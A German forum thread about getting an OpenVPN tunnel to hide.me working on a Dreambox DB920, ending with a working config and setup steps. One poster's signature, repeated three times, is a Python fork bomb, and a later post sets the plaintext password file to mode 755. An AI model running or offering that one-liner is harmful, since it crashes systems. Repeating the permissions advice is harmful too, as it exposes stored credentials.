[gelöst] DB920 VPN einrichten (hide.me)

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • Hallo,

      habe den Befehl eingegeben... es wurde etwas installiert / geudatet.
      Denke wir kommen dem Fehler näher, aber leider wird der Tunnel immer noch nicht aufgebaut.


      Und habe Im Ordner /var/log/
      die Datei ovpn.log (Atribute 755) angelegt. Nur damit dies nicht mehr rot angezeigt wird.

      The post was edited 1 time, last by ultra-S ().

    • Moin und was steht in deiner /var/log
      bei mir liegt die unter log /etc/openvpn/openvpn.log aber das sollte egal sein.
      Hast du eine FB davor und vielleicht den UDP-Port zugemacht? wobei er ja versucht raus zu kommen

      PING rosendaal.hideservers.net (109.201.143.99) 56(84) bytes of data.


      so sieht das ende des Logs aus bei mir und dann steht die Verbindung

      Mon Oct 14 15:12:41 2019 TUN/TAP device tun0 opened
      Mon Oct 14 15:12:41 2019 TUN/TAP TX queue length set to 100
      Mon Oct 14 15:12:41 2019 /sbin/ip link set dev tun0 up mtu 1500
      Mon Oct 14 15:12:41 2019 /sbin/ip addr add dev tun0 10.8.8.49/24 broadcast 10.8.8.255
      Mon Oct 14 15:12:41 2019 /sbin/ip route add 51.158.24.50/32 via 192.168.2.1
      Mon Oct 14 15:12:41 2019 /sbin/ip route add 0.0.0.0/1 via 10.8.8.1
      Mon Oct 14 15:12:41 2019 /sbin/ip route add 128.0.0.0/1 via 10.8.8.1
      Mon Oct 14 15:12:41 2019 Initialization Sequence Completed


      PS: hast du es schon mal mit einem anderen Server versucht die haben doch bestimmt noch andere. Hatte bei NordVpn auch mal das Problem das es am Server lag.

      The post was edited 2 times, last by weizen44 ().

    • Hallo ja, habe eine fritzbox... (7490 Vodafone)

      Wäre noch eine Idee den Port 4000 mal auf zu machen.
      Teste ich heute abend einmal.
      Der Support von hide.me meinte das openvpn läuft nur das plugin zum Schluss keine Antwort bekommt.
      Habe die log file dort angelegt, da openvpn im oberen Bild es rot mackiert hatte.
      Gestern Abend war sie leer.

      Muss ich den log extra starten mit einem befehl?! Gucke ich später mal genauer rein.

      Danke, guter Hinweis.
    • Moin,
      hast du mal bei Vodafone nachgefragt ob du überhaupt ein IPv4 Zugang hast?
      Sonst wird es ganz schön dunkel.

      Falls der Techniker bei Vodafone sagt das du einen DS-lite Anschluss hast bitte in diesen auf Dual -Stack umzuschalten
    • Hallo..

      Guter Einwand, aber ich habe eine "volle" IP v4.
      Kein DSL Light oder Kombie Leitung.
      Alle Einstellungen zu IP v6 sind in meinem Netzwerk deaktiviert (Router / Switch usw.)

      Auf meinem Notebook / Workstations / alte DM800se / Smartphone funktioniert der VPN Tunnel.
      Vodafone hat hier nur eine kleine Drosselung im UDP Bereich, so daß ich auf meinen Windows 10 Maschinen ein anderes Protokoll fahre.

      Laut meinem VPN Anbieter startet der Tunnel nur die Weitergabe der IP vom localen Netzwerk in den Tunnel ist fehlerhaft.
      An dem Thema bin ich gerade dran.

      Heute stelle ich die Dreambox auf DHCP um und gebe eine voll Port Freigabe zum Testen im Router frei.

      Aktuell habe ich eine feste IP Adresse im Router hinterlegt und UDP Port 4000 freigegeben.

      Im Switch ist die IP + Mac Adresse dem LAN Port von der DB920 gefixt, sodass das Netzwerk sicherer und schneller läuft.

      Wie gesagt die Einstellung im Netzwerk sind die gleichen wie in der alten Box. (bis auf die Mac Adresse natürlich).

      Grüße

      Ps: Hidme hat neuerdings in IPv6 Support.

      The post was edited 2 times, last by ultra-S ().

    • Tada ...


      Es läuft !!
      Der Support konnte mir helfen

      Die Lösung:
      In der openvpn.conf (bzw. openvpn.cfg) muss zwingend dieser eintrag:

      redirect-gateway def1


      1. OpenVPN Stoppen (systemctl stop openvpn@openvpn)

      2. in die Datei den Wert von oben eintragen

      3. OpenVPN Starten (systemctl start openvpn@openvpn)


      • Status überprüfen (Hide.me/check im Webbrowser)

      • Status Check in Telnet (systemctl status openvpn@openvpn)

      • Autostart (systemctl enable openvpn@openvpn)





      DANKE AN ALLE, die sich die ZEIT genommen haben !!



      Meine Config:
      • openvpn.conf


      client
      dev tun
      proto udp
      remote lu.hide.me 4000
      cipher AES-256-CBC
      auth SHA256
      resolv-retry infinite
      nobind
      persist-key
      persist-tun
      mute-replay-warnings
      verb 3
      auth-user-pass /etc/openvpn/userpass.txt
      reneg-sec 0
      remote-cert-tls server
      verify-x509-name "*.hide.me" name
      tls-version-min 1.2
      key-direction 0
      redirect-gateway def1




      <ca>
      -----BEGIN CERTIFICATE-----
      *********************************
      -----END CERTIFICATE-----
      </ca>


      <tls-auth>
      -----BEGIN OpenVPN Static key V1-----
      **********************************
      -----END OpenVPN Static key V1-----
      </tls-auth>


      • userpass.txt
      **Benutzername**
      **Password**
    • also Ich hab das Teil wieder runtergeschmissen , Ich weiss nicht wieso aber laufend wird die openvpn.conf umgeschrieben , auch wenn ich sie mit schreibschutz versehe .
      Hatte sogar die Box (900er) sogar neu aufgesetzt . Dasselbe Spiel , mal funktionierts mal nicht .
    • Hallo zusammen.

      Habe jetzt nochmal das normale Plugin - VPN (cyberghost) installiert.
      Hier wird mir die neue IP wunderbar angezeigt
      Der Grund.
      So kann ich schnell alles kontrollieren und den autostart bzw. OpenVPN starten/beenden ohne immer per Telnet auf die Box zu konekten.

      Bei mir läuft jetzt alles ohne Probleme.


      Warum die config evtl. umgeschrieben wird:
      In dem cyberghost Plugin NICHT auf Speichern (Gründe Taste) drücken, wenn in der Gui was verändert wird.
      Daten einfach in der Oberfläche ändern und mit EXIT aus dem Plugin raus gehen.
      Daten die du geändert hast bleiben (zB Benutzername / Password usw.) erhalten.

      Fand ich am Anfang auch verwirrend.
    • meinName77 wrote:

      also Ich hab das Teil wieder runtergeschmissen , Ich weiss nicht wieso aber laufend wird die openvpn.conf umgeschrieben , auch wenn ich sie mit schreibschutz versehe .
      Hatte sogar die Box (900er) sogar neu aufgesetzt . Dasselbe Spiel , mal funktionierts mal nicht .
      Mit dieser Aussage kann keiner was anfangen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Könnt ihr nicht lesen? Das Plugin ist für Cyberghost und dieser Beitrag auch also bleibt doch einfach weg mit eurem zeug es kann keiner was dafür das ihr euren dienst nicht zum laufen bringt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo... ZUSAMMEN.

      Ich glaube es ist am anfang etwas tükisch, wenn man z. B. von einer DB800 mit Vpn plugin aus dem Feed auf eine 900/920 wechselt und so denk," ich mache das mal eben wie früher auf meine alte Box".

      @kati910 natürlich hast du recht das dein Plugin nur optimal für cyberghost optimiert ist.
      Und eigentlich ist das Dinge eine feine Sache.

      Ich benutze davon nur die IP Anzeige, und die Option zum starten und beenden.
      Der Rest ist nicht relevant bzw.
      würde, wie du richtig sagst, nur für cyberghost funktionieren.

      Ich z. B. habe das schon am Anfang gesehen, aber es wurde auch gesagt mal soll einfach die config in den Ordner kopieren und das wars.
      So einfach war es dann doch nicht.
      Man denkt schnell, es ist irgendwo sonst wo ein Fehler im Netzwerk.

      Die alte OpenVPN Version hat hier einfach ein Virtuelles Netzwerk (Virtel LAN Adapter) angelegt und schon lief es.
      Das macht die openVPN Variante bei der DB 920 aus dem Feed nicht mehr.
      Wie man das Problem behebt, habe ich oben beschrieben.

      Zweites Problem, wenn man denkt, man installiere aus dem Feed die normale OpenVPN Version - die absolut ausreichend ist, findet man keine Oberfläche bzw. Einstellmoglichkeit -
      das man hier nur mit Telnet arbeitet, muss man erstmal wissen.

      Ich habe in einer Woche so viel gerlent in diesem Zusammenhang, dass ich jetzt diese Fehler nicht meh machen würde.

      Man darf nicht immer davon ausgehen das jeder in diesem Bereich sehr gut unterwegs ist.
      Natürlich ist man es auch mal leid immer die gleichen Fragen zu beantworteten. Kann ich verstehen.

      Nichts für ungut, aber ich habe die Lösung über meinen VPN Anbieter bekommen.
      Hierzu sollten die anderen User mit problem auch mal an denen rantreten.

      Für den Rest habe ich oben eine gute Lösung geschrieben. Bzw gute Hinweise geliefert mit Hilfe diesen FORUM.

      Daher denke ich kann man dies hier abschließend.

      Grüße
    • Bei Openvpn hängt 95% vom Server ab und da müssen wir die Config mehr oder weniger vom anbieter übernehmen denn wie der server eingestellt ist wissen die am allerbesten und da wird einem die Problematik an dem ganzen schnell klar.Jeder anbieter macht es anders aber die gemeinsamkeit ist das openvpn die config in /etc/openvpn/ erwartet names openvpn.conf somit wenn die config funktioniert geht das auch ohne cyberghost app.Aber wie du selber merkst ist der Lerneffekt enorm und das ist doch auch viel wert.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Moin zusammen, :)

      ich hänge mich mit meinem Post mal hier drunter, weil ich denke, dass es hier ganz gut passt:

      Habe jetzt mit erfolgreich ein VPN eingerichtet auf einer 920er über diesen Weg:

      1. OPENVPN auf der Box installiert mit
      apt-get update
      apt-get install enigma2-plugin-newnigma2-vpn && apt-get -y -f install

      2. Von meinem VPN-Anbieter die passende Konfigurationsdatei mit der Endung .ovpn gezogen und

      3. deren Endung ovpn nach conf umbenannt und nach /etc/openvpn/ auf der Box kopiert

      Ergänzende Info dazu: Irgendwelche Zertifikatsdateien habe ich neben der ovpn-Datei nicht erhalten, konnte aber im nächsten Schritt sehen, dass Zertifikatsinfos in die Datei "eingebettet" sind.

      4. In dieser Datei auf der Box die Zeile
      auth-user-pass /etc/openvpn/pass.txt
      ergänzt und

      5. die Datei pass.txt, nur mit vom Provider benannten usernamen (1. Zeile) und Passwort (2. Zeile) dort erstellt und gespeichert.

      6. Mit chmod 755 /etc/openvpn/* alles für alle in diesem Ordner ausführbar gesetzt.

      7. Die ganze Kiste mit reboot einfach mal neu gestartet.

      8. Mit /etc/openvpn/<Name der conf-Datei> ohne spitze Klammern, die VPN-Funktion gestartet.

      Das Einrichten eines Autostarts für die Funktion mit den hier und anderswo genannten systemctl enable oder start Befehlen ist mir allerdings bis dato noch nicht gelungen.

      Wenn jemand ne Idee hat, jederzeit gerne, ansonsten können andere gerne schon mal von diesen Erkenntnissen profitieren.

      Gruß, Quengel
    • Das Paket enigma2-plugin-newnigma2-vpn ist nicht identisch mit openvpn. Im Grunde brauchst du für eine universale Nutzung (universal in Bezug auf verschiedene Anbieter) lediglich:

      apt-get update && apt-get install openvpn
      apt-get -f install
      reboot

      dann: [gelöst] DM525 - openVPN Autostart mit eigener Konfiguration funktioniert nicht mehr